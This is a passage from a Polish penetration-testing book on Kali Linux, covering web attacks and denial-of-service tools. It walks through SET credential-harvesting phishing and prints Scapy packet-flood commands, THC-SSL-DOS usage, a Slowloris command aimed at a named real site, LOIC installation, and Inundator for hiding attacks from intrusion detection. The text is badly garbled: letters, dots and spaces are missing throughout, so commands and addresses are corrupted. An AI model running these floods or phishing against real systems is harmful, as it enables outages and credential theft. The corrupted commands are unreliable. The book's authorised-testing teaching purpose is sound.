Zwroacute uwag e w pasku adresu przegl darki wy wietlany jest adres 127001 W wi kszo ciprzypadkoacutew b dziesz musia jednak u y nieco bardziej wyrafinowanych wektoroacutew atakuaby przekona u ytkownikoacutew do odwiedzenia Twojej spreparowanej strony internetowejMo esz to zrobi na wiele sposoboacutew na przyk ad poprzez rozsy anie do u ytkownikoacutew pocztelektroniczn specjalnie przygotowanej wiadomo ci zawieraj cej cze do Twojej spreparowanejwitryny internetowej (zobacz pierwszy rysunek na nast pnej stronie)
Kiedy u ytkownik rozpocznie wpisywanie nazwy konta i has a dost pu na naszej fa szywejstronie udaj cej witryn Facebook pakiet SET przechwyci ca y zwi zany z tym ruch sieciowyi nast pnie przekieruje u ytkownika do prawdziwej witryny internetowej Istnieje bardzo du-a szansa na to e po takim przekierowaniu u ytkownik b dzie przekonany e po prostu po-
myli si podczas wpisywania has a i zaloguje si jeszcze raz nie maj c wiadomo ci e bdquopodrodzerdquo pakiet SET przechwyci nazw jego konta i has o dost pu (zobacz drugi rysunek nanast pnej stronie)
Jak wida na powy szym rysunku pakiet SET przechwyci nazw naszego konta u ytkownikaDrChaos i nasze has o dost pu ILoveKali
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
253
Po zako czeniu tego wiczenia u yj kombinacji klawiszy Ctrl+C aby zako czy prac programuSET i wygenerowa raport w formacie HTML SET generuje profesjonalnie wygl daj cy ra-port ktoacuterego mo esz z powodzeniem u y podczas tworzenia raportu ko cowego z przepro-wadzonego testu penetracyjnego
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
254
Fimap
Fimap to narz dzie napisane w j zyku Python przeznaczone do wyszukiwania i wykorzysty-wania podatno ci i luk w zabezpieczeniach aplikacji internetowych pozwalaj cych na przeprowa-dzanie atakoacutew typu LFI (ang Local File Inclusion) lub RFI (ang Remote File Inclusion)
Aby uruchomi pakiet Fimap w systemie Kali Linux przejd do grupy Kali Linux a nast pniewybierz polecenie Web ApplicationsWeb Vulnerability Scannersfimap Po wybraniu tegopolecenia na ekranie pojawi si nowe okno terminala z wy wietlonym ekranem powitalnympolecenia fimap Dla pakietu fimap istnieje roacutewnie kilka dodatkowych wtyczek ktoacutere mo eszpobra z internetu i zainstalowa za pomoc nast puj cego polecenia
fimap --install -plugins
Dost pne wtyczki zostan wy wietlone w formie listy z opcj pozwalaj c na zainstalowaniewybranej wtyczki lub zako czenie dzia ania polecenia Jak wida w naszym przyk adzie do-st pne s dwie dodatkowe wtyczki st d polecenie instalowania musimy wykona dwukrotnieindywidualnie instaluj c poszczegoacutelne wtyczki (zobacz pierwszy rysunek na nast pnej stronie)
Aby u y pakietu Fimap musisz najpierw poda adres URL witryny ktoacutera b dzie celem skaneraIstnieje wiele metod definiowania adresoacutew URL Mo esz na przyk ad poda jeden wybrany adresURL ca list adresoacutew URL mo esz u y wyszukiwarki Google do zebrania adresoacutew URL
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
255
ale roacutewnie dobrze mo esz u y innych metod takich jak zbieranie wszystkich adresoacutew URLz hiper czy zamieszczonych na danej stronie internetowej czy pozyskiwanie adresoacutew URL z for-mularzy i nag oacutewkoacutew stron W naszym przypadku celem skanera b dzie witryna httpwwwthesecuritybloggercom
Aby uruchomi skanowanie witryny httpwwwthesecuritybloggercom powiniene wpisanast puj ce polecenie
fimap -u httpwwwthesecuritybloggercom
Pakiet Fimap rozpocznie skanowanie i sproacutebuje automatycznie wykry podatno ci na atakitypu LFIRFI Na rysunku przedstawionym poni ej wida jednak e witryna wwwthesecurity
bloggercom jest odporna na tego typu ataki
Ataki typu DoSW zdecydowanej wi kszo ci przypadkoacutew celem przeprowadzania testoacutew penetracyjnych jestidentyfikacja potencjalnych i rzeczywistych podatno ci i luk w zabezpieczeniach bez umy l-nego zak oacutecania dzia ania atakowanego systemu i bez robienia mu krzywdy w jakikolwiek in-ny sposoacuteb Jest to kluczowy element odroacute niaj cy autoryzowanego pentestera od z o liwegonapastnika maj cego niecne zamiary Prawdziwy napastnik nie przestrzega adnych regu
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
256
i nie zwraca uwagi na to czy jego dzia ania spowoduj zak oacutecenia w funkcjonowaniu atako-wanego systemu je eli tylko takie post powanie b dzie dla niego korzystne Czasami zdarzasi nawet e napastnik b dzie wr cz za wszelk cen szuka mo liwo ci zak oacutecenia dzia aniaczy nawet ca kowitego wy czenia atakowanego systemu Z tego powodu w niektoacuterych przypad-kach przeprowadzenie testoacutew odporno ci danej witryny czy aplikacji internetowej na ataki typuDoS (ang Denial of Service) mo e by bardzo po dane Testy tego rodzaju cz sto s nazywanetestami warunkoacutew skrajnych lub testami odporno ci na przeci enie systemu (ang stress testing)
Jedn z najwa niejszych spraw zwi zanych z testami odporno ci na ataki typu DoS jest bezwzgl dne uzyska-nie pisemnej zgody w a ciciela systemu na przeprowadzanie takich atakoacutew Niektoacutere metody atakoacutewmog mie negatywny wp yw na funkcjonowanie systemu nawet po zako czeniu testoacutew Dobrym roz-wi zaniem jest przeprowadzanie takich testoacutew na systemach z redundancj systemach nieprodukcyj-nych czy systemach zainstalowanych w rodowisku laboratoryjnym o ile to oczywi cie mo liwe
Najcz ciej spotykana metoda ataku DoS polega na bdquozalewaniurdquo badanego systemu masowonap ywaj cymi z zewn trz daniami Takie przeci enie zazwyczaj skutecznie uniemo liwiasystemowi odpowiadanie na rzeczywiste dania od autoryzowanych klientoacutew lub co najmniejtak spowalnia wysy anie odpowiedzi e ca y system staje si dla klientoacutew praktycznie bezu-yteczny Ataki typu DoS mog by skierowane na zasoby systemu (np przypisana przestrze
dyskowa przepustowo po cze sieciowych itd) konfiguracj systemu (np usuwanie tablicroutingu) informacje o stanie systemu (np resetowanie sesji TCP) oraz ka dy inny elementrodowiska systemu ktoacuterego przeci enie mo e spowodowa zak oacutecenie jego normalnego
funkcjonowania
Roacute nica pomi dzy atakami DoS (ang Denial of Service) a DDoS (ang Distributed Denial of Service) polega natym e do przeprowadzania ataku DoS napastnik wykorzystuje tylko jeden komputer podczas gdy w przy-padku atakoacutew DDoS liczba maszyn bior cych udzia w ataku mo e si ga tysi cy Omawianie zagadniezwi zanych z atakami DDoS wykracza niestety daleko poza ramy naszej ksi ki
Istniej cztery g oacutewne kategorie atakoacutew DoSDDoS Ataki wykorzystuj ce przeci enie po cze sieciowych (ang Volume Based
Attacks) mdash taki rodzaj ataku jest zwi zany z bdquozalewaniemrdquo atakowanego systemumasowo nap ywaj cymi pakietami UDP ICMP i innymi Celem takiego ataku jestprzeci enie po cze sieciowych atakowanego systemu nadmiernymi ilo ciamiprzesy anych pakietoacutew
Ataki na protoko y komunikacyjne (ang Protocol Attacks) mdash ataki te maj na celunadmierne wykorzystywanie zasoboacutew urz dze sieciowych takich jak routeryzapory sieciowe urz dzenia roacutewnowa ce obci enie po cze sieciowychPrzyk adami atakoacutew na protoko y komunikacyjne s ataki typu SYN floodPing of Death Smurf Teardrop wymuszanie fragmentacji pakietoacutew itp
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
257
Ataki na warstw aplikacji (ang Application Layer Attacks) mdash takie ataki wykorzystujnormalny ruch sieciowy do zak oacutecenia dzia ania lub nawet spowodowania awariidanej witryny lub aplikacji internetowej Przyk adami mog by ataki typu Zero-Dayczy ataki wykorzystuj ce inne podatno ci i luki w zabezpieczeniach witryn i aplikacjiinternetowych
Ataki powoduj ce wyczerpanie zasoboacutew sesji (ang Session Exhaustion) mdash takieataki powoduj wyczerpanie liczby dozwolonych jednocze nie sesji poprzez ci g enawi zywanie nowych po cze bez zamykania starych sesji co prowadzido wyczerpania zasoboacutew systemu
W systemie Kali Linux znajdziesz wiele narz dzi pozwalaj cych na wykorzystywanie podat-no ci i luk w zabezpieczeniach Narz dzia te na przyk ad Metasploit mog by u ywane doprzeprowadzania atakoacutew DoS na warstw aplikacji (wiele z tych narz dzi omawiali my ju wewcze niejszych rozdzia ach) W rozdziale 3 prezentowali my popularne narz dzie Scapypozwalaj ce na przeprowadzanie atakoacutew DoS na protoko y komunikacyjne Poni ej znaj-dziesz omoacutewienie kilku kolejnych narz dzi s u cych do przeprowadzania atakoacutew DoS ktoacuteremo esz znale w systemie Kali Linux
Aby przetestowa skuteczno ataku DoS mo esz u y witryny httpwwwupordownorg ktoacutera sprawdzadost pno podanej witryny internetowej
THX-SSL-DOSProtokoacute SSL (ang Secure Socket Layer) jest u ywany do nawi zywania bezpiecznych po -cze i transakcji w internecie Nawi zanie bezpiecznego po czenia z wykorzystaniem proto-ko u SSL wymaga u ycia po stronie serwera 15 razy wi kszej mocy obliczeniowej ni po stro-nie klienta Atak typu THC-SSL-DOS wykorzystuje t dysproporcj przez proacuteb prze adowaniaserwera spreparowanymi daniami nawi zania sesji SSL a do momentu kiedy przeci onyserwer si poddaje i przestaje odpowiada na dania przesy ane od innych autoryzowanychklientoacutew Atak wykorzystuje mechanizm renegocjacji bezpiecznego po czenia SSL do gene-rowania tysi cy takich da dla pojedynczego po czenia TCP Z tego powodu atak ten jestroacutewnie znany jako atak typu SSL-Exhaustion (ang mdash bdquowyczerpanie zasoboacutew SSLrdquo) Zalettakiego podej cia jest to e mo liwo ci przetwarzania da nawi zania sesji SSL s znaczniewy sze po stronie klienta co oznacza e przeci tny laptop pod czony do sieci za po red-nictwem cza o przeci tnej szybko ci mo e rzuci powa ne wyzwanie niemal ka demu serwero-wi aplikacji internetowych Podatno serweroacutew internetowych na ataki typu SSL-Exhaustionjest powszechnie znana a mimo to nie uda o si jeszcze opracowa skutecznej metody zapo-biegania takim atakom
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
258
Aby uruchomi pakiet THC-SSL-DOS w menu g oacutewnym systemu przejd do grupy Kali Linuxa nast pnie wybierz polecenie Stress TestingWeb Stress Testingthc-ssl-dos Po wybraniu pole-cenia pojawi si nowe okno terminala z ekranem powitalnym polecenia thc-ssl-dos Sk adniapolecenia jest nast puj ca
thc-ssl-dos [opcje] ltadres IP ofiarygt ltportgt and --accept
W wierszu wywo ania polecenia musisz umie ci opcj --accept w przeciwnym wypadku otrzymaszkomunikat o b dzie przedstawiony poni ej
Po uruchomieniu programu THC-SSL-DOS zobaczysz na ekranie kilka zabawnych komuni-katoacutew informuj cych e dzia anie programu si rozpocz o Na pierwszym rysunku zamiesz-czonym poni ej wida e zaatakowana witryna nie obs uguje protoko u SSL st d programwy wietla na ekranie komunikat o wyst pieniu b du Na kolejnym rysunku przedstawionosytuacj w ktoacuterej pomy lnie rozpocz si proces renegocjacji sesji SSL co w efekcie mo edoprowadzi do zak oacutecenia dzia ania atakowanego systemu Pami taj ataki tego typu mo eszprzeprowadza tylko na systemach dla ktoacuterych uzyska e pisemne zezwolenie w a cicielaPrzeprowadzenie takiego ataku mo e doprowadzi do powa nego ograniczenia funkcjonalno-ci atakowanego systemu lub nawet do jego ca kowitego za amania
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
259
ScapyJednym z najpopularniejszych narz dzi s u cych do przeprowadzania atakoacutew typu DoS jestScapy Program zosta napisany w j zyku Python a jego autorem jest Phillippe Biondi Scapypozwala na tworzenie modyfikowanie i dekodowanie zawarto ci pakietoacutew sieciowych wstrzyki-wanie pakietoacutew do sieci przechwytywanie pakietoacutew oraz dopasowywanie da i odpowiedziProgram posiada roacutewnie wiele innych mechanizmoacutew takich jak skanowanie portoacutew traso-wanie pakietoacutew sprawdzanie urz dze sieciowych przeprowadzanie atakoacutew czy wykrywanieurz dze sieciowych
Jedn z cz sto wykonywanych operacji jest przechwytywanie pakietoacutew TCP i wysy anie ichdalej do sieci za po rednictwem programu Scapy Aby uruchomi ten program w oknie ter-minala wpisz polecenie scapy Po uruchomieniu programu b dziesz moacuteg wykonywa pole-cenia bezpo rednio z jego wiersza polece
W przyk adzie ktoacutery przedstawiamy poni ej sproacutebujemy u y pakietu Scapy do wysy aniaspreparowanych pakietoacutew TCP do naszego serwera testowego W naszym przypadku serwertestowy ma adres IP 10001 ale w realnym scenariuszu mo e to by dowolny router czyserwer WWW Oproacutecz podania adresu atakowanego serwera musimy roacutewnie okre li liczbpakietoacutew ktoacutere zostan wys ane do celu W naszym przypadku b dzie to 2000 pakietoacutew cze-go mo emy dokona za pomoc nast puj cego polecenia
send(IP(dst=10001ttl=0)TCP()iface=eth0count=2000)
Powoduje ono wys anie 2000 pakietoacutew z interfejsu sieciowego eth0 do serwera o adresie10001 Jak zapewne zauwa y e czas ycia wysy anych pakietoacutew (parametr ttl) jest ustawio-ny na warto 0 Z punktu widzenia protoko u TCP istnienie takich pakietoacutew jest niemo liweInaczej moacutewi c wysy aj c pakiety z tak spreparowan warto ci parametru ttl proacutebujemywprowadzi atakowany serwer internetowy co najmniej w zak opotanie W realnym scenariu-szu potencjalny napastnik wysy a by do atakowanego serwera miliony takich pakietoacutew Wartozauwa y e w sprzyjaj cych okoliczno ciach zak oacutecenie pracy czy nawet powa na awaria serweramo e by spowodowana odebraniem nawet jednego niepoprawnego czy specjalnie z o liwiespreparowanego pakietu sieciowego Oczywi cie w zale no ci od zamiaroacutew mo esz dowolniemodyfikowa poszczegoacutelne opcje wysy ania pakietoacutew
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
260
Poni ej przedstawiamy kilkana cie popularnych scenariuszy atakoacutew przeprowadzanych przyu yciu pakietu Scapy
Nieprawid owa wersja protoko u IP
send(IP(dst=10001 src=10203040 version=0) TCP(dport=www) iface=eth0 count=2000)
Nieprawid owa suma kontrolna pakietu TCP
send(IP(dst=10001)TCP(chksum=0x5555)iface=eth0count=2000)
Nieprawid owe flagi pakietu TCP (wszystkie flagi wyzerowane i numer sekwencji usta-wiony na 0)
send(IP(dst=10001)TCP(flags=seq=555)iface=eth0 count=2000)
Nieprawid owe flagi pakietu TCP (wszystkie flagi ustawione jednocze nie)
send(IP(dst=10001)TCP(flags=0x0ff)iface=eth0count=2000)
Ustawiona tylko flaga FIN
send(IP(dst=10001)TCP(flags=F)iface=eth0count=2000)
Rozmiar nag oacutewka wi kszy od rozmiaru pakietu L2
send(IP(dst=10001 src=10203040 ihl=15L)TCP(dport=www) iface=eth0 count=2000)
Zbyt ma y rozmiar nag oacutewka pakietu
send(IP(dst=10001 src=10203040 ihl=2L)TCP(dport=www) iface=eth0 count=2000)
ICMP Flood
send(IP(dst=10001)ICMP()iface=eth0count=2000)
Nieprawid owa suma kontrolna pakietu IP
send(IP(dst=10001 src=10203040 chksum=0x5500) TCP(dport=www) iface=eth0 count=2000)
Fragmentacja pakietoacutew IP
send(IP(dst=10001 src=10203040 frag=1)TCP(dport=www) iface=eth0 count=2000)
Rozmiar pakietu IP wi kszy ni rozmiar pakietu warstwy L2
send(IP(dst=10001 src=10203040 ihl=5L len=80) TCP(dport=www) iface=eth0 count=2000)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
261
roacuted owy adres IP taki sam jak docelowy adres IP
send(IP(dst=10001 src=10001)TCP(dport=www) iface=eth0 count=2000)
Rozmiar pakietu warstwy L2 wi kszy ni rozmiar pakietu IPsend(IP(dst=10001len=32) Raw(load=bla-bla-bla-bla-bla-blabla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)UDP(dport=80len=48) Raw(load=bla-bla-bla-bla-bla-bla-bla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)ICMP() Raw(load=bla-bla-bla-blabla-bla-bla-bla)iface=eth0count=2000)
Brak pakietu warstwy L4
send(IP(dst=10001 src=10203040) iface=eth0 count=2000)
Jednocze nie ustawione flagi SYN i FIN
send(IP(dst=10001)TCP(flags=FS)iface=eth0count=2000)
Rozmiar nag oacutewka pakietu TCP wi kszy ni rozmiar pakietu warstwy L2
send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=15L) iface=eth0 count=2000)
Zbyt ma y rozmiar nag oacutewka TCP (mniejszy ni 5 bajtoacutew)
send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=1L) iface=eth0 count=2000)
Slowloris
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
262
Slowloris to klient HTTP ktoacutery umo liwia przeprowadzanie atakoacutew typu DoS nawet za po-rednictwem cza o wzgl dnie ma ej przepustowo ci Metoda ataku wykorzystywana w tym
programie jest unikatowa i pozwala na przeprowadzenie skutecznego ataku bez uciekania sido powszechnie wykorzystywanych technik bdquozalewaniardquo serweroacutew masowo wysy anymi pa-kietami Slowloris otwiera wiele roacutewnoleg ych po cze do atakowanego serwera i podtrzy-muje je w otwartym stanie poprzez przesy anie cz ciowych da HTTP Po otwarciu po -czenia program cyklicznie w regularnych odst pach czasu przesy a do serwera setkikolejnych nag oacutewkoacutew da co zapobiega zamkni ciu po czenia przez serwer Takie zacho-wanie powoduje wyczerpanie limitu roacutewnoleg ych sesji serwera co w efekcie uniemo liwiajego normalne dzia anie W przypadku witryn sieciowych przystosowanych do du ego nat -enia ruchu proces przejmowania kolejnych po cze przez pakiet Slowloris mo e zaj nieco
czasu poniewa inni u ytkownicy musz zwalnia swoje po czenia zanim b d one mog yzosta zaj te przez Slowloris Nie zmienia to jednak w niczym faktu e po pewnym czasieSlowloris poma u ale skutecznie przechwyci wszystkie dost pne sesje i doprowadzi do za-wieszenia dzia ania serwera
Program Slowloris dzia a skutecznie zw aszcza w odniesieniu do serweroacutew WWW wykorzy-stuj cych przetwarzanie wielow tkowe ktoacutere s z definicji wra liwe na ograniczanie liczby do-st pnych w tkoacutew Przyk adami takich serweroacutew s Apache 1x i 2x dhttpd GoAhead i inne
Pakiet Slowloris nie jest domy lnie instalowany w systemie Kali Linux 10 ale mo esz go pobra ze stronyhttphackersorgslowloris
Aby uruchomi program pobierz skrypt pl ze strony autora otwoacuterz nowe okno terminalaprzejd do katalogu ze skryptem i wykonaj polecenie przedstawione poni ej
perl slowlorispl
W oknie terminala pojawi si ekran pomocy programu Aby rozpocz atak na wybrany serwerpowiniene wpisa polecenie przedstawione powy ej i doda opcj -dns a po niej wpisa adresserwera b d cego celem ataku Aby zaatakowa na przyk ad witryn wwwthesecuritybloggercompowiniene wpisa nast puj ce polecenie (zobacz pierwszy rysunek na nast pnej stronie)
perl slowlorispl -dns thesecuritybloggercom
Po rozpocz ciu ataku b dziesz moacuteg obserwowa w oknie terminala proces przejmowaniakolejnych po cze co po pewnym czasie mo e doprowadzi do za amania si atakowanegosystemu (zobacz drugi rysunek na nast pnej stronie)
Je eli atak przeprowadzany za pomoc pakietu Slowloris si powiedzie atakowany serwerprzestanie odpowiada na dania (zobacz trzeci rysunek na nast pnej stronie)
Powy ej mo esz zobaczy skutki ataku DoS na witryn httpwwwthesecuritybloggercom (prosimy niepowtarzaj tego eksperymentu)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
263
LOIC czyli Niskoorbitalne Dzia o JonowehellipPakiet LOIC (ang Low Orbit Ion Cannon czyli wspomniane w tytule podrozdzia u Niskoorbital-ne Dzia o Jonowe) to narz dzie do badania odporno ci zasoboacutew sieciowych na przeci enieLOIC pozwala na sprawdzanie ilo ci ruchu sieciowego jaki mo e obs u y dany system Ta-kie informacje mog by poacute niej wykorzystywane do planowania rozbudowy i wdra ania sze-rokopasmowych po cze sieciowych Program ten sta si inspiracj do utworzenia innych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
264
narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki
Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa
Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej
apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs
Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej
mkdir loic
Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej
wget httpsrawgithubcomnicolargoloicinstaller masterloicsh
Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie
chmod 777 loicsh
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
265
Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej
loicsh install
Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie
loicsh update
Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie
loicsh run
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
266
U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny
Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP
Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding
Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane
DNSChef
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
267
Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne
Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera
SniffJoke
SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
268
SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force
Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)
Sk adnia wywo ania polecenia siege jest nast puj ca
siege [opcje] ltadres URL celugt
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
269
Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-
nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku
InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
270
wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS
TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych
Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci
PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce
W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia
W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew
Kup książkę Poleć książkę
Skorowidz
Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275
harmonogram 276zabezpiecze systemu 276
ALE 31analiza
bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych
zawieraj cychoprogramowanie firmware298
ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat
299zawarto ci plikoacutew PDF 299
da HTTP 203aplet Java 156aplikacje internetowe 23
b dy w zabezpieczeniach286
wykrywanie i mapowanie 241zakres testoacutew penetracyjnych
